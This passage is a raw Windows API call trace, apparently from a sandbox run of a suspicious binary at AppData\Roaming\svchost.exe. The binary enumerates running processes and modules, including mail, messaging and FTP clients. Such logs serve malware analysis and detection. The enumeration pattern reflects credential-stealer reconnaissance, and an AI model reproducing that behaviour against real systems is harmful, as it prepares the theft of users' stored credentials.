lpmodinfo=0x25ac4b8, cb=0x18 | out: lpmodinfo=0x25ac4b8*(lpBaseOfDll=0x170000, SizeOfImage=0x17000, EntryPoint=0x1714a1)) returned 1 [0073.214] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x170000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="accupos.exe") returned 0xb [0073.214] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x170000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files\\DVD Maker\\accupos.exe" (normalized: "c:\\program files\\dvd maker\\accupos.exe")) returned 0x26 [0073.215] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25ae6c0, cb=0x18 | out: lpmodinfo=0x25ae6c0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.215] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.215] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.216] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x25b0880, cb=0x18 | out: lpmodinfo=0x25b0880*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.216] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.216] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.217] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x25b2a58, cb=0x18 | out: lpmodinfo=0x25b2a58*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.217] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.218] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.218] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x25b4c28, cb=0x18 | out: lpmodinfo=0x25b4c28*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.218] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.219] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.219] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb30) returned 0x214 [0073.220] EnumProcessModules (in: hProcess=0x214, lphModule=0x25b7348, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25b7348, lpcbNeeded=0x23ee40) returned 1 [0073.220] GetModuleInformation (in: hProcess=0x214, hModule=0x10a0000, lpmodinfo=0x25b75b8, cb=0x18 | out: lpmodinfo=0x25b75b8*(lpBaseOfDll=0x10a0000, SizeOfImage=0x17000, EntryPoint=0x10a14a1)) returned 1 [0073.220] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x10a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="barca.exe") returned 0x9 [0073.221] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x10a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\barca.exe" (normalized: "c:\\program files\\reference assemblies\\barca.exe")) returned 0x2f [0073.221] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25b97d0, cb=0x18 | out: lpmodinfo=0x25b97d0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.221] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.221] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.222] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x25bb990, cb=0x18 | out: lpmodinfo=0x25bb990*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.222] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.222] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.223] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x25bdb50, cb=0x18 | out: lpmodinfo=0x25bdb50*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.223] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.224] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.224] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x25bfd20, cb=0x18 | out: lpmodinfo=0x25bfd20*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.224] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.225] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.226] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf4) returned 0x214 [0073.226] EnumProcessModules (in: hProcess=0x214, lphModule=0x25c2440, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25c2440, lpcbNeeded=0x23ee40) returned 1 [0073.226] GetModuleInformation (in: hProcess=0x214, hModule=0xf20000, lpmodinfo=0x25c26b0, cb=0x18 | out: lpmodinfo=0x25c26b0*(lpBaseOfDll=0xf20000, SizeOfImage=0x17000, EntryPoint=0xf214a1)) returned 1 [0073.226] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xf20000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="thunderbird.exe") returned 0xf [0073.227] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xf20000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files\\Microsoft Office\\thunderbird.exe" (normalized: "c:\\program files\\microsoft office\\thunderbird.exe")) returned 0x31 [0073.227] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25c48d8, cb=0x18 | out: lpmodinfo=0x25c48d8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.227] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.227] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.228] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x25c6ab0, cb=0x18 | out: lpmodinfo=0x25c6ab0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.228] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.228] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.230] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x25c8c70, cb=0x18 | out: lpmodinfo=0x25c8c70*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.230] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.231] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.231] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x25cae40, cb=0x18 | out: lpmodinfo=0x25cae40*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.231] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.232] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.232] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x818) returned 0x214 [0073.233] EnumProcessModules (in: hProcess=0x214, lphModule=0x25cd560, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25cd560, lpcbNeeded=0x23ee40) returned 1 [0073.233] GetModuleInformation (in: hProcess=0x214, hModule=0x60000, lpmodinfo=0x25cd7d0, cb=0x18 | out: lpmodinfo=0x25cd7d0*(lpBaseOfDll=0x60000, SizeOfImage=0x17000, EntryPoint=0x614a1)) returned 1 [0073.233] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x60000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="whatsapp.exe") returned 0xc [0073.234] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x60000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Journal\\whatsapp.exe" (normalized: "c:\\program files\\windows journal\\whatsapp.exe")) returned 0x2d [0073.234] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25cf9f0, cb=0x18 | out: lpmodinfo=0x25cf9f0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.234] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.234] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.235] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x25d1bb0, cb=0x18 | out: lpmodinfo=0x25d1bb0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.235] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.235] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.236] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x25d3d70, cb=0x18 | out: lpmodinfo=0x25d3d70*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.236] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.237] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.237] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x25d5f40, cb=0x18 | out: lpmodinfo=0x25d5f40*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.237] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.238] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.238] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a0) returned 0x214 [0073.239] EnumProcessModules (in: hProcess=0x214, lphModule=0x25d8660, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25d8660, lpcbNeeded=0x23ee40) returned 1 [0073.239] GetModuleInformation (in: hProcess=0x214, hModule=0x1380000, lpmodinfo=0x25d88d0, cb=0x18 | out: lpmodinfo=0x25d88d0*(lpBaseOfDll=0x1380000, SizeOfImage=0x17000, EntryPoint=0x13814a1)) returned 1 [0073.239] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x1380000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ball.exe") returned 0x8 [0073.240] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x1380000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Portable Devices\\ball.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\ball.exe")) returned 0x38 [0073.240] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25dab18, cb=0x18 | out: lpmodinfo=0x25dab18*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.240] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.241] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.241] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x25dccd8, cb=0x18 | out: lpmodinfo=0x25dccd8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.241] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.242] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.242] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x25dee98, cb=0x18 | out: lpmodinfo=0x25dee98*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.243] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.243] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.244] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x25e1068, cb=0x18 | out: lpmodinfo=0x25e1068*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.244] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.261] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.261] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x43c) returned 0x214 [0073.261] EnumProcessModules (in: hProcess=0x214, lphModule=0x25e3788, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25e3788, lpcbNeeded=0x23ee40) returned 1 [0073.262] GetModuleInformation (in: hProcess=0x214, hModule=0x940000, lpmodinfo=0x25e39f8, cb=0x18 | out: lpmodinfo=0x25e39f8*(lpBaseOfDll=0x940000, SizeOfImage=0x17000, EntryPoint=0x9414a1)) returned 1 [0073.262] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x940000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="webdrive.exe") returned 0xc [0073.263] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x940000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\WindowsPowerShell\\webdrive.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\webdrive.exe")) returned 0x35 [0073.263] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25e5c28, cb=0x18 | out: lpmodinfo=0x25e5c28*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.266] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.266] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.267] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x23f6eb0, cb=0x18 | out: lpmodinfo=0x23f6eb0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.267] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.268] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.268] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x23f9070, cb=0x18 | out: lpmodinfo=0x23f9070*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.268] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.269] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.269] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x23fb240, cb=0x18 | out: lpmodinfo=0x23fb240*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.270] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.270] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.271] CloseHandle (hObject=0x214) returned 1 [0073.272] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0073.272] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb28) returned 0x214 [0073.272] EnumProcessModules (in: hProcess=0x214, lphModule=0x23fd960, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x23fd960, lpcbNeeded=0x23ee40) returned 1 [0073.273] GetModuleInformation (in: hProcess=0x214, hModule=0xd70000, lpmodinfo=0x23fdbd0, cb=0x18 | out: lpmodinfo=0x23fdbd0*(lpBaseOfDll=0xd70000, SizeOfImage=0x17000, EntryPoint=0xd714a1)) returned 1 [0073.273] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.273] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xd70000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="alftp.exe") returned 0x9 [0073.274] CoTaskMemFree (pv=0xd93200) [0073.274] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.274] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xd70000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\alftp.exe" (normalized: "c:\\program files\\windows portable devices\\alftp.exe")) returned 0x33 [0073.274] CoTaskMemFree (pv=0xd93200) [0073.274] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x23ffdf0, cb=0x18 | out: lpmodinfo=0x23ffdf0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.275] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.275] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.275] CoTaskMemFree (pv=0xd93200) [0073.275] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.275] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.276] CoTaskMemFree (pv=0xd93200) [0073.276] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2401fb0, cb=0x18 | out: lpmodinfo=0x2401fb0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.276] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.276] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.277] CoTaskMemFree (pv=0xd93200) [0073.277] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.277] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.277] CoTaskMemFree (pv=0xd93200) [0073.277] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x2404170, cb=0x18 | out: lpmodinfo=0x2404170*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.278] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.278] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.278] CoTaskMemFree (pv=0xd93200) [0073.278] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.278] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.279] CoTaskMemFree (pv=0xd93200) [0073.279] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2406340, cb=0x18 | out: lpmodinfo=0x2406340*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.279] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.279] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.280] CoTaskMemFree (pv=0xd93200) [0073.280] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.280] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.281] CoTaskMemFree (pv=0xd93200) [0073.281] CloseHandle (hObject=0x214) returned 1 [0073.282] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0073.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbec) returned 0x214 [0073.282] EnumProcessModules (in: hProcess=0x214, lphModule=0x2408a60, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2408a60, lpcbNeeded=0x23ee40) returned 1 [0073.283] GetModuleInformation (in: hProcess=0x214, hModule=0x280000, lpmodinfo=0x2408cd0, cb=0x18 | out: lpmodinfo=0x2408cd0*(lpBaseOfDll=0x280000, SizeOfImage=0x17000, EntryPoint=0x2814a1)) returned 1 [0073.283] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.283] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x280000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="smartftp.exe") returned 0xc [0073.284] CoTaskMemFree (pv=0xd93200) [0073.284] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.284] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x280000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files\\Uninstall Information\\smartftp.exe" (normalized: "c:\\program files\\uninstall information\\smartftp.exe")) returned 0x33 [0073.284] CoTaskMemFree (pv=0xd93200) [0073.284] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x240af10, cb=0x18 | out: lpmodinfo=0x240af10*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.284] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.284] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.285] CoTaskMemFree (pv=0xd93200) [0073.285] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.285] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.285] CoTaskMemFree (pv=0xd93200) [0073.285] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x240d0d0, cb=0x18 | out: 